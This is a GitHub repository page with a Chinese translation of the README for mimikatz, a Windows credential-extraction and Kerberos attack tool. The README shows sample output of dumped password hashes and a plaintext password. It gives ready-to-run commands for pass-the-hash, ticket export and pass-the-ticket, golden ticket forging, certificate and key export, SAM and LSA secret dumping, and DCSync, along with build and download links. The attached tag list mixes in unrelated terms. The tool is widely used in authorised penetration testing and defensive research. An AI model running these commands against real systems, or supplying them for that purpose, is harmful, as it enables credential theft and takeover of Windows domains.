ParrotSec/mimikatz
GitHub: ParrotSec/mimikatz
Windows 凭证提取与 Kerberos 攻击的经典工具,支持从内存获取密码哈希、票据传递、黄金票据构建及 DCSync 等多种攻击技术。
Stars: 2368 | Forks: 336
# mimikatz
**`mimikatz`** 是我为了学习 `C` 语言并对 Windows 安全性进行一些实验而制作的工具。
它现在以从内存中提取明文密码、哈希、PIN 码和 kerberos 票据而闻名。**`mimikatz`** 还可以执行哈希传递、票据传递或构建 _Golden tickets_(黄金票据)。
```
.#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03)
.## ^ ##.
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 13 modules * * */
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session : Interactive from 2
User Name : Gentil Kiwi
Domain : vm-w7-ult-x
SID : S-1-5-21-1982681256-1210654043-1600862990-1000
msv :
[00000003] Primary
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* LM : d0e9aee149655a6075e4540af1f22d3b
* NTLM : cc36cf7a8514893efccd332446158b1a
* SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
tspkg :
* Username : Gentil Kiwi
* Domain : vm-w7-ult-x
* Password : waza1234/
...
```
但这还不是全部!`Crypto`、`Terminal Server`、`Events`……更多信息请参阅 GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki 或 http://blog.gentilkiwi.com(法语,_是的_)。
如果你不想自己构建,可以在这里下载二进制文件:https://github.com/gentilkiwi/mimikatz/releases
## 快速使用
```
log
privilege::debug
```
### sekurlsa
```
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd
```
### kerberos
```
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi
```
### crypto
```
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export
```
### vault & lsadump
```
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local
```
## 构建
`mimikatz` 采用 Visual Studio Solution 和 WinDDK 驱动程序(主要操作可选)的形式,因此前置条件如下:
* 对于 `mimikatz` 和 `mimilib`:用于 Desktop 的 Visual Studio 2010、2012 或 2013(**2013 Express for Desktop 是免费的,且支持 x86 和 x64** - http://www.microsoft.com/download/details.aspx?id=44914)
* _对于 `mimikatz driver`、`mimilove`(以及 `ddk2003` 平台):Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_
`mimikatz` 使用 `SVN` 进行源代码控制,但现在也支持 `GIT`!
你可以使用任何你喜欢的工具进行同步,甚至是 Visual Studio 2013 中集成的 `GIT` =)
### 同步!
* GIT URL 为 :https://github.com/gentilkiwi/mimikatz.git
* SVN URL 为 :https://github.com/gentilkiwi/mimikatz/trunk
* ZIP 文件为 :https://github.com/gentilkiwi/mimikatz/archive/master.zip
### 构建解决方案
* 打开解决方案后,选择 `Build` / `Build Solution`(你可以更改架构)
* `mimikatz` 现已构建完成,随时可以使用!(`Win32` / `x64`,如果你运气好甚至包括 `ARM64`)
* 你可能会遇到关于 `_build_.cmd` 和 `mimidrv` 的 `MSB3073` 错误,这是因为如果没有 Windows Driver Kit **7.1** (WinDDK) 就无法构建驱动程序,但 `mimikatz` 和 `mimilib` 是没问题的。
### ddk2003
通过这个可选的 MSBuild 平台,你可以使用 WinDDK 构建工具以及默认的 `msvcrt` 运行时(二进制文件更小,无依赖项)。
对于这个可选平台,Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 和 Visual Studio **2010** 是必须的,即使你计划之后使用 Visual Studio 2012 或 2013。
请遵循以下说明:
* http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
* _http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_
## 许可证
CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/
`mimikatz` 的开发需要咖啡:
* PayPal: https://www.paypal.me/delpy/
## 作者
* Benjamin DELPY `gentilkiwi`,你可以在 Twitter ( @gentilkiwi ) 上联系我,或通过邮件 ( benjamin [at] gentilkiwi.com )
* `lsadump` 模块中的 DCSync 和 DCShadow 功能是与 Vincent LE TOUX 合写的,你可以通过邮件 ( vincent.letoux [at] gmail.com ) 联系他,或访问他的网站 ( http://www.mysmartlogon.com )
这是一个**个人**开发项目,请尊重其理念,不要将其用于不良行为!
标签:Cloudflare, CTF学习, C 语言, Kerberos 攻击, LSASS 内存, Mimikatz, MITRE ATT&CK, Modbus, NTLM 哈希, RFI远程文件包含, SCADA, Windows 安全, 内网渗透, 凭据转储, 协议分析, 哈希传递, 域渗透, 密码抓取, 权限提升, 模拟器, 电子数据取证, 票据传递, 端点可见性, 黄金票据